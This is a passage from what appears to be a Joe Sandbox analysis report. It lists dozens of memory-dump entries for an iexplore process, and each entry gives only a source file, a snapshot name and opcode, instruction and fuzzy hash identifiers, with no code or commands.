                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                                                                                                                              • Instruction ID: fb51586dc49f954a0a8331c6b27f644b3f070d4452ee5606c087b1e61fe89eb5
                                                                                                                                                                              • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                                                                                                                              • Instruction Fuzzy Hash: EF01C4715267129BCB21CF159C40A7ABBA9FB457707048A6DF8959B780D731D860CBA0
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 033c7d0b2ae44422ebce2154557742a3691f2d14fb16af8e6b3c79a4aabb0a57
                                                                                                                                                                              • Instruction ID: 16d5e1a325e9169dfc53eca902db9b10cdd320d3c7b74a82a6f41f7befd22c57
                                                                                                                                                                              • Opcode Fuzzy Hash: 033c7d0b2ae44422ebce2154557742a3691f2d14fb16af8e6b3c79a4aabb0a57
                                                                                                                                                                              • Instruction Fuzzy Hash: 36117375561318ABDF25EB64CC42FD97378AF04710F5045D5A314AA1E0DBB09EC1CF84
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 3347811d7231d0871b5abd45bc90ce0bfe4666e188afda1093a3486ba913e49e
                                                                                                                                                                              • Instruction ID: 028c4ab5369703788fd495dc3038f5da93645f4490797717e10fee6499c8747e
                                                                                                                                                                              • Opcode Fuzzy Hash: 3347811d7231d0871b5abd45bc90ce0bfe4666e188afda1093a3486ba913e49e
                                                                                                                                                                              • Instruction Fuzzy Hash: A7117936261740EFDB26EF18D990F16B7B8FF44B44F240065EA059F6A1D275ED41CA90
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                                                                                                              • Instruction ID: 0768c7256863892455770c8f797191bdfa915b298d93df82211887da05033e4d
                                                                                                                                                                              • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                                                                                                              • Instruction Fuzzy Hash: 12012832621301DBDF14EB19D880B52B76AFFD4700F5949A5ED02CF285DAB1D8D1C390
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                                                                                                                              • Instruction ID: 98a5b280f576a5dad7d1fb589cda742820dafef3c6aafa08904f944d58d8ca24
                                                                                                                                                                              • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                                                                                                                              • Instruction Fuzzy Hash: 9601D836120B559FDB22D67AD840FA7B7EDFFC5650F084819E9468B540DAB0E581C7A0
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: e05ac2a4d29462f558e7642671b9b40c43ff066a253a0ae10b2324d9cbabad4a
                                                                                                                                                                              • Instruction ID: ea71b84f80159aca40415a9c26494440fe8b28667d749824cf9c008f45396c34
                                                                                                                                                                              • Opcode Fuzzy Hash: e05ac2a4d29462f558e7642671b9b40c43ff066a253a0ae10b2324d9cbabad4a
                                                                                                                                                                              • Instruction Fuzzy Hash: AA116D35A2024DEFDF05EF64C850FAFBBB9EB44740F004159EA059B290DA75EE91CB90
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 16eb1e9227c9ca53ee971aeba792c6b4be561f846bb8a1c766c052503132072f
                                                                                                                                                                              • Instruction ID: acf753a2bb4911b28586771545d3ebf8e68dec648e0a5957e6d1782bffe147a3
                                                                                                                                                                              • Opcode Fuzzy Hash: 16eb1e9227c9ca53ee971aeba792c6b4be561f846bb8a1c766c052503132072f
                                                                                                                                                                              • Instruction Fuzzy Hash: AA116972920B02DFDB21DF15C880B22B3E4FF40762F19886DE4994E5A6C7B5E8C1CB60
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 5807426d3854de8340053ba828383e613f6f2126caef2cc0c9319ce74fae2529
                                                                                                                                                                              • Instruction ID: 4d4b777300d65dca362f5c298ee9bfbf8a7e2571fa1a1535511c61a6e56875ce
                                                                                                                                                                              • Opcode Fuzzy Hash: 5807426d3854de8340053ba828383e613f6f2126caef2cc0c9319ce74fae2529
                                                                                                                                                                              • Instruction Fuzzy Hash: B401F93A710605ABCF12DB9FCC40E9FBBBC9F85780B150429BA05D7120EA74DD81C760
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 2103513d2fbd223765d54b27d59d1ce24549dd4e977acd5ce3c70b0a80ca45ab
                                                                                                                                                                              • Instruction ID: f383f5e15253fdf210e055954357e58e069990fcfd7ee7ee1747047f911f8f37
                                                                                                                                                                              • Opcode Fuzzy Hash: 2103513d2fbd223765d54b27d59d1ce24549dd4e977acd5ce3c70b0a80ca45ab
                                                                                                                                                                              • Instruction Fuzzy Hash: A5014776A306849BDB11DE54E800FE5B3B9EB84764F14415AFE958F281CBB4D8C1C790
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: df5dc24dca14675cf8483cdcb16ec241ce92efdd32c68150ee83cd43a3ec4332
                                                                                                                                                                              • Instruction ID: 6c4f9b19bb64dc43a895536689b33edcd039d5bcbf02cbdedcc6027bd0da3cdf
                                                                                                                                                                              • Opcode Fuzzy Hash: df5dc24dca14675cf8483cdcb16ec241ce92efdd32c68150ee83cd43a3ec4332
                                                                                                                                                                              • Instruction Fuzzy Hash: F101F739B30648DBD714EB76DC959AEB7B8FF40320F1940699901AB280EE70DD81C691
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                                                                                                                              • Instruction ID: bb798cd44fbb6b8fe7f27412a4b5aa5b512b315f970183333d0cb00731799a17
                                                                                                                                                                              • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                                                                                                                              • Instruction Fuzzy Hash: 78015A72224681DFE726C61DC948F26B7D8EF45750F0E04A2F909DBA91E768DCC0C661
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 28adad9432ec4a59fb5e6f6884b7b2a5d758c19e055e7dbdf1aabcde48439be4
                                                                                                                                                                              • Instruction ID: 006c1b9b1fe9c13a9a7de3511a86d96ec899795ea1e5a80e566c5e750bf98548
                                                                                                                                                                              • Opcode Fuzzy Hash: 28adad9432ec4a59fb5e6f6884b7b2a5d758c19e055e7dbdf1aabcde48439be4
                                                                                                                                                                              • Instruction Fuzzy Hash: 1A018475A20358EBDB10EBA5D855FAFB7B8EF44700F44406AB501EF280D6B4DD40C794
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 12d69b80bc09a443baffa0cc5cbca6f8f88db38978ae6a908cdca1f93a55da69
                                                                                                                                                                              • Instruction ID: e55596d33dfde9271844e2881c656f44701300612e66d90dcfe3f6a49795b747
                                                                                                                                                                              • Opcode Fuzzy Hash: 12d69b80bc09a443baffa0cc5cbca6f8f88db38978ae6a908cdca1f93a55da69
                                                                                                                                                                              • Instruction Fuzzy Hash: 2111A5B1A106219FDB88CF2DC0C0651BBE8FB88350B0582AAED18CB74AD374E915CF94
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: a2998ad77a19dcac687c909d09e7b8a85e3f2dcd606bb6781848cb4456013db7
                                                                                                                                                                              • Instruction ID: 465cb7e4c1ad2cbf5c379e346808de151ff8551e343d892943bb03d7ac544bb9
                                                                                                                                                                              • Opcode Fuzzy Hash: a2998ad77a19dcac687c909d09e7b8a85e3f2dcd606bb6781848cb4456013db7
                                                                                                                                                                              • Instruction Fuzzy Hash: C9118078D10289EFDB04EFA9D440A9EB7B4FF08304F14845AB915EB350D774EA42CBA4
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                                                                                                              • Instruction ID: 98db6ab3995a61a54423e6146bdda7a3f7398fa294cbdde79033667cbefb1eae
                                                                                                                                                                              • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                                                                                                              • Instruction Fuzzy Hash: D5F0FC37234B329BD732D6B95880B3BA695AFC1A64F190036E5099F204C9F48C8256D1
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 7120e14c5d3fed2c7a362ed8416bb3121b7925316d6029fb0f8b7785164e137d
                                                                                                                                                                              • Instruction ID: cd29ba8f3a3137a137041b6692a2fd612138463146b6ae794b613a3dd1510476
                                                                                                                                                                              • Opcode Fuzzy Hash: 7120e14c5d3fed2c7a362ed8416bb3121b7925316d6029fb0f8b7785164e137d
                                                                                                                                                                              • Instruction Fuzzy Hash: 20012C75A20249ABDB00DFA9D9919EEBBB8FF49304F10405AF905EB350D674AA418BA4
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 15b43ee02ad7525c8f08aa8f5d53c3b49ca4a9b7cc788ab3d9a222469f73f282
                                                                                                                                                                              • Instruction ID: b2cb08b2c64b099fc01810630f5019866a330f13ce4ad14bc433dbe1481ed355
                                                                                                                                                                              • Opcode Fuzzy Hash: 15b43ee02ad7525c8f08aa8f5d53c3b49ca4a9b7cc788ab3d9a222469f73f282
                                                                                                                                                                              • Instruction Fuzzy Hash: 9D017175A103489BDB00DF69D9819EEB7B8EF49304F10405AF901EB341D674AA418BA0
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                                                                                                              • Instruction ID: 5d47db9f5930a72b73c4fb4a861609912b9db0397becfdde274b7e686bb44e7d
                                                                                                                                                                              • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                                                                                                              • Instruction Fuzzy Hash: 92F0C2B2600A21ABD324CF4DDC40E67F7EADBC0B80F088129A545CB220EA71DD44CB90
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: e5c9447b530fa018747decbfdb7a2361570a78d0d98d5628ccaa8a2e15e8e9f9
                                                                                                                                                                              • Instruction ID: 62f7a6e2c3fe3669402cfa0dada06e5ceb3829c63a2fe3906f852bca9200fc44
                                                                                                                                                                              • Opcode Fuzzy Hash: e5c9447b530fa018747decbfdb7a2361570a78d0d98d5628ccaa8a2e15e8e9f9
                                                                                                                                                                              • Instruction Fuzzy Hash: 17017175A10309ABDB00DF69D9819DEBBB8EF49300F10405AF901FB340D674AA018BA0
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 142e258c31b2854674597990c3f52e5af594bf5f99f2c3b686c6bb1bb1f636c8
                                                                                                                                                                              • Instruction ID: 78d26a655dfe6e584da042fc0d366bd35aa064a10620993c55e838475a871afd
                                                                                                                                                                              • Opcode Fuzzy Hash: 142e258c31b2854674597990c3f52e5af594bf5f99f2c3b686c6bb1bb1f636c8
                                                                                                                                                                              • Instruction Fuzzy Hash: 60F0FF72A11215AFE719CF5CC840FAAF7EDEB46790F19406AD500DF270E6B1EE04CA94
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 63923f04911c41dcfe30dbb2c113b6235ad292fe0b78dad4735a95def88225b4
                                                                                                                                                                              • Instruction ID: c2fa3be036218cb4b31b0fcb80819c027597b790b28ecba137c9091c5f2c37a1
                                                                                                                                                                              • Opcode Fuzzy Hash: 63923f04911c41dcfe30dbb2c113b6235ad292fe0b78dad4735a95def88225b4
                                                                                                                                                                              • Instruction Fuzzy Hash: 94014074E103499FCB04DFA9D581A9EB7F4EF08344F00806AB905EB350E674DA00CB90
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 625d879e7307b4d2be2032b94ffd5e60e9c4a19f2b8a97c8f3e3d434e4d67a03
                                                                                                                                                                              • Instruction ID: e6f87d5c690610055dbb0ae94875a2fb237f49447b2790a0618b5823976cc8bb
                                                                                                                                                                              • Opcode Fuzzy Hash: 625d879e7307b4d2be2032b94ffd5e60e9c4a19f2b8a97c8f3e3d434e4d67a03
                                                                                                                                                                              • Instruction Fuzzy Hash: D7F0CD76F10748ABD704DFB9C8559DEB7B8EF45710F00805AE501EB290D9B4D9418751
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 962e8ec6e243dcf8670981abcb693529482e4d67e4bc987758845e07a9db1742
                                                                                                                                                                              • Instruction ID: ab54ca2efe92371413b4a267a207e70a383c7373dd933a16f25f1ec728b3d7d6
                                                                                                                                                                              • Opcode Fuzzy Hash: 962e8ec6e243dcf8670981abcb693529482e4d67e4bc987758845e07a9db1742
                                                                                                                                                                              • Instruction Fuzzy Hash: 8D018F71A102489BDB00DFA9D851AEEB7B8AF48310F14405AF900AB280D778EA01CBA4
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 44620c8b90c707c3135ebb5afdba643e124f7b09bfea536c61b6b3c3b840e391
                                                                                                                                                                              • Instruction ID: f18e63e79892f6b203dd553bf6a3d5c3ee9151842454194ba61a03668da5daf9
                                                                                                                                                                              • Opcode Fuzzy Hash: 44620c8b90c707c3135ebb5afdba643e124f7b09bfea536c61b6b3c3b840e391
                                                                                                                                                                              • Instruction Fuzzy Hash: B1F0F675A31356ABEF14E7AD8940FEAB7B8DFC0750F0885A5BD419B240DA70E9C0C790
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: e06135fd4330bf52fb1c9df410ec3b31fb6144bd821e09f12eb3665c7be9807c
                                                                                                                                                                              • Instruction ID: 66bfe6d29bed16bbcb6de9d054904947391efd82e6e15e8bf8183d5aa41b77a4
                                                                                                                                                                              • Opcode Fuzzy Hash: e06135fd4330bf52fb1c9df410ec3b31fb6144bd821e09f12eb3665c7be9807c
                                                                                                                                                                              • Instruction Fuzzy Hash: 87011EB4A102499FDB04DFA9D595B9EF7F4FF08300F148269A519EB381DA749A408B90
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: bfbd8c682218d2494a1c0db70b2028c1540a3e4c83994e9e79c1dffcef6f86f7
                                                                                                                                                                              • Instruction ID: ae61b5b6f5f7d35b6963318dc9e411c4076673d2961a4176a6d732beb7f083ae
                                                                                                                                                                              • Opcode Fuzzy Hash: bfbd8c682218d2494a1c0db70b2028c1540a3e4c83994e9e79c1dffcef6f86f7
                                                                                                                                                                              • Instruction Fuzzy Hash: 7EF090722743265BE614DA299C11B22729AF7C0A51F69807AEE058F6C0EAB1D9C1C794
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 9c86c39bdb6e5f373c63bc0b61fffc749c090866831c7dd43b14b299580d1563
                                                                                                                                                                              • Instruction ID: f53e66083a717ebd4bb548d98b70b758435e732e6645d4bd73fc55f7bb2160f4
                                                                                                                                                                              • Opcode Fuzzy Hash: 9c86c39bdb6e5f373c63bc0b61fffc749c090866831c7dd43b14b299580d1563
                                                                                                                                                                              • Instruction Fuzzy Hash: DAF04476940344BFEB11DB64CD41FDA77BCDB04750F100166B955DA190EA70AE44CB90
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                                                                                                              • Instruction ID: 02f8c2d843dd4a1e054a84ab583e93d616e3aa51c7b782fd3953c3d987ccdf64
                                                                                                                                                                              • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                                                                                                              • Instruction Fuzzy Hash: C3F0E935341E3247DB36EA2BCCA0F2AEA55AF80E40B59452C9642CF640DF60DC5087C0
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 42b3f3bdd5c7b54442d85dc7825ee1681feb15fa18299f45b3bc4e179c611304
                                                                                                                                                                              • Instruction ID: 8ea986d534bf8560f21c9c12311320b7153ce5b9a8e60427b1e96835e19180f2
                                                                                                                                                                              • Opcode Fuzzy Hash: 42b3f3bdd5c7b54442d85dc7825ee1681feb15fa18299f45b3bc4e179c611304
                                                                                                                                                                              • Instruction Fuzzy Hash: 0CF04F75E10348AFCB04EFA9D555A9EB7F4EF08300F40806AB945EB391D674DA41CB54
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 5811be30b18fb48e348385ca5d8a781d74b47d495e5c0599b163573d762b0bfa
                                                                                                                                                                              • Instruction ID: 3cbf856d0e7372713a651ae687cc7c5315811dac8aecae395ea4027c01ad516d
                                                                                                                                                                              • Opcode Fuzzy Hash: 5811be30b18fb48e348385ca5d8a781d74b47d495e5c0599b163573d762b0bfa
                                                                                                                                                                              • Instruction Fuzzy Hash: D9F0FA32200740AFD731EB19CC04F9BBBFDEF84B00F080119E546830A0C7B0A988C660
